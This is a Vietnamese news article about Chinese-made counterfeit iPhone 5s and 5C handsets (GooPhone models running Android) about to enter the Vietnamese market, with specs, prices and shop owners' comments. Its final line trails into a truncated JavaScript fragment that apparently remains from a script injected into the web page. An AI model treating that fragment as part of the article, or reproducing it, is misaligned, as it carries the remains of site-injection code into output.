Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > iPhone 5s và iPhone 5C nhái chuẩn bị tràn vào thị trường Việt

iPhone 5s và iPhone 5C nhái chuẩn bị tràn vào thị trường Việt

Sau khi Apple ra mắt thị trường bộ đôi sản phẩm iPhone mới – iPhone 5s và iPhone 5C thì hiện nay những mẫu iPhone “nhái” đã xuất hiện tại thị trường Trung Quốc. Trong khi đó các chủ cửa hàng tại TP HCM và Hà Nội đã nhận được lời mời chào nhập hàng.

Anh Hoàng Minh Phú, một chủ cửa hàng tại TP HCM cho biết, một số đối tác bên Trung Quốc đang chào hàng iPhone 5s và 5C “nhái”. Theo anh Phú, đợt hàng nhái này có thể tràn vào Việt Nam chỉ trong vài tuần tới.

Hàng “nhái” làm giống hể hàng thật

iPhone 5s nhái được làm nút Home giống hệt với phiên bản chính hãng

Tại Hà Nội, nhiều chủ cửa hàng cũng cho biết, các mẫu điện thoại Trung Quốc nhái hàng của Apple cũng sắp xuất hiện. Không giống như các dòng iPhone Fake trước đây, máy của Trung Quốc hiện nay có thiết kế giống và trông hoàn thiện hơn rất nhiều.

“Bên trong chúng vẫn có các icon mô phỏng, nhưng tất cả đều chạy trên Android, vào sâu bên trong người dùng sẽ dễ dàng nhận biết đây là hàng nhái”, anh Phú cho biết thêm.

Tương tự như mẫu iPhone 5 nhái, các mẫu 5s và 5C được giao cho các cửa hàng ở mức giá dưới 150 USD và khi đến tay khách hàng thì rơi vào tầm 3.8 – 4.5 triệu đồng. Theo một số cửa hàng trên đường 3/2, quận 11, khi máy về nước họ sẽ cho người phát tờ rơi ở các ngã tư chính. Một chủ cửa hàng cho biết “nhiều người dùng thích điện thoại của Apple, nhưng họ không có tiền để mua và với các model giá rẻ này thì họ có thể sở hữu một chiếc smartphone có bề ngoài giống hệt với thiết bị của Apple”.

Trong vài năm trở lại đây, điện thoại Trung Quốc thương hiệu lạ dần dần ít đi. Theo đó, nhiều nhãn hàng bắt đầu đi nhái các thiết bị của Apple, Samsung, HTC. Những thiết bị này đều được quảng cáo đến người dùng với các thông điệp như siêu rẻ, thiết kế không khác gì so với sản phẩm gốc.

Bên trong thì khác hoàn toàn

iPhone 5C nhái cũng có nhiều màu sắc tương tự như bản gốc

Hiện ở Trung Quốc, các mẫu iPhone 5s và iPhone 5C nhái đã được sản xuất. Với iPhone 5C, máy cũng có nhiều màu sắc và thiết kế giống hệt với bản chính hãng. Trong khi đó, 5s cũng có màu vàng, trắng. Nút Home cũng được trang bị tính năng Touch ID với lỗ cạn hơn nhưng không thể sử dụng được chức năng nhận diện vân tay.

Một trang web của Trung Quốc đã đăng tải lên hình ảnh quảng cáo của 5s và 5C nhái của một nhà sản xuất có tên là GooPhone. Bộ đôi iPhone nhái này đều chạy trên nền tảng Android và có giao diện mô phỏng iOS 7.

Đây hầu hết là các thiết bị gia công chạy chip xử lý của MediaTek giá rẻ. Cấu hình chung của các sản phẩm là màn hình 4 inch, độ phân giải 960 x 540 px, RAM 1GB, bộ nhớ trong 16GB, camera sau 5 Mpx và máy cũng có đèn Flash LED cùng camera trước 2 Mpx.

Giá của GooPhone iPhone 5s và GooPhone iPhone 5C nằm ở mức 199 USD và 119 USD. Nhiều chủ cửa hàng tại TP HCM cho biết, mức giá này có thể rẻ hơn nữa tùy vào số lượng đặt. Nếu với số lượng lớn thì giá cho mỗi chiếc 5s nhái là 100 USD. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘